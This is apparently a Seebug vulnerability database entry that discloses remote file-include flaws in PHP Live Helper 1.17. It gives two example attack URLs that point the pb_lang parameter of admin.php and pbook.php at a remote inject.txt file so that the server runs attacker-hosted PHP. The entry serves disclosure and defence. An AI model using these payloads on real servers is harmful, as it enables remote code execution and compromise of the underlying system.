PHP Live Helper 1.17 Multiple Remote File Include Vulnerabilities

2014-07-01T00:00:00
ID SSV:82372
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/20603/info

PHP Live Helper is prone to multiple remote file-include vulnerabilities.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[p-book_path]/admin.php?pb_lang=http://www.example.com/inject.txt?
http://www.example.com/[p-book_path]/pbook.php?pb_lang=http://www.example.com/inject.txt?